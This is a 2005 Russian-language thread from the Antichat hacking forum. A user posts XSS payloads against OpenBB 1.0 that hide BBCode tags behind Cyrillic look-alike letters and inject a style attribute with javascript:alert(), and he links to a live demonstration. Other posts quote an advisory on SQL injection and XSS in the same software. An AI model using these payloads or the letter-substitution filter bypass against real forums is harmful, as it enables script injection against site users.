ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу XSS в OpenBB
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

XSS в OpenBB
  #1  
Старый 23.05.2005, 17:24
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


Lightbulb XSS в OpenBB
OpenBB 1.0 (уязвимы возможно и другие версии)
Травиально.

как всегда через руские буквы
Код:
[еmаil=]aaa[/emаil]`style=background:url(javascript:alert());

[cоlor=a]a[/colоr]`style=background:url(javascript:alert());

[sizе=[cоlor=a=`]a[/cоlor]]a[/sizе]`style=background:url(javascript:alert());
Есть ещё XSS, в основном с использованием других тегов,
найти их очень просто, я их не пишу.


Пример работы уязвимости:
http://s-channel.hut.ru/forum/read.php?TID=6&page=1#87
Последний раз редактировалось KEZ; 23.05.2005 в 17:41..
 
Ответить с цитированием

  #2  
Старый 23.05.2005, 17:27
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
Также я нашел несколько Sql инжекция. Скоро опубликую
 
Ответить с цитированием

  #3  
Старый 23.05.2005, 20:04
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию
КЕЗ, ты на локалхосте её сначала проверял?
Я тож как узнал про уязвимости
Цитата:
Опасность:критическая
Тип:удалённая
Описание:параметр TID в скрипте read.php не фильтруется должным образом что может привести к SQL - иньекции.
В параметр reverse в member.php можно внедрить произвольный HTML или JavaScript код и вызвать XSS
Уязвимые версии:OpenBB 1.x
Наличие эксплойта:нет
Решения:нет
сразу на оффсайт, думаю скачаю, поищу, тока ни оффсайт, ни другие сайты, ссылки с которых ведут на оффсайт, не фурачат =(
И вот мля опять я опаздал =(

З.Ы. Обажаю таких разработчиков, дыры(сплойты) примитивнейшие.
Последний раз редактировалось PinkPanther; 25.05.2005 в 01:02..
 
Ответить с цитированием

  #4  
Старый 23.05.2005, 20:14
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
Это фигня с securitylab.ru.
А свои теги я сам нашел... И как я их мог НЕ ПРОВЕРЯТь на локалхосте? Конечно проверял.
Самый обычные XSS
 
Ответить с цитированием

  #5  
Старый 23.05.2005, 20:23
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию
Не, я не то имел ввиду. Просто(может я галимо искал), но во время приведенного мной описания релиза оффсайт не работал. Вот это я и спросил...

Забей кароче....я просто хотел узнать где и когда ты его качнул, хочу сам посмотеть.

З.Ы. Обажаю таких разработчиков, дыры(сплойты) примитивнейшие.
Последний раз редактировалось PinkPanther; 23.05.2005 в 20:26..
 
Ответить с цитированием

  #6  
Старый 23.05.2005, 20:26
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
примитивные... да... они подойдут и к другим форумам кстате...
емейл, урл, имадж - самые распространенные... а сколько на форуме SQL inj
 
Ответить с цитированием

  #7  
Старый 23.05.2005, 20:38
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию
Вот зайди щас на оффсайт: http://www.openbb.com/ и ты поймеш мой вопрос.
Где ты его взял? Потому что, толи я галимо ищу, толи его хер где найдеш нормальный.
Дай плиз ссылку, где качал. Мне оч интересно самому посмотреть.
 
Ответить с цитированием

  #8  
Старый 23.05.2005, 21:00
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
Я гдето с sourceforge.net качал... щас кажу
 
Ответить с цитированием

  #9  
Старый 23.05.2005, 21:03
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Цитата:
Сообщение от KEZ  
OpenBB 1.0 (уязвимы возможно и другие версии)
Травиально.

как всегда через руские буквы
Код:
[еmаil=]aaa[/emаil]`style=background:url(javascript:alert());
 
[cоlor=a]a[/colоr]`style=background:url(javascript:alert());
 
[sizе=[cоlor=a=`]a[/cоlor]]a[/sizе]`style=background:url(javascript:alert());
Есть ещё XSS, в основном с использованием других тегов,
найти их очень просто, я их не пишу.


Пример работы уязвимости:
http://s-channel.hut.ru/forum/read.php?TID=6&page=1#87
Первые две я не совсем понял...там где-то ошибка..
 
Ответить с цитированием

  #10  
Старый 24.05.2005, 21:06
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
Алгол, все верно, я же только что проверял на форумах и локалхосте.
Может там изза того что я буквы заменил на руские или форум чтото пропарсил
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ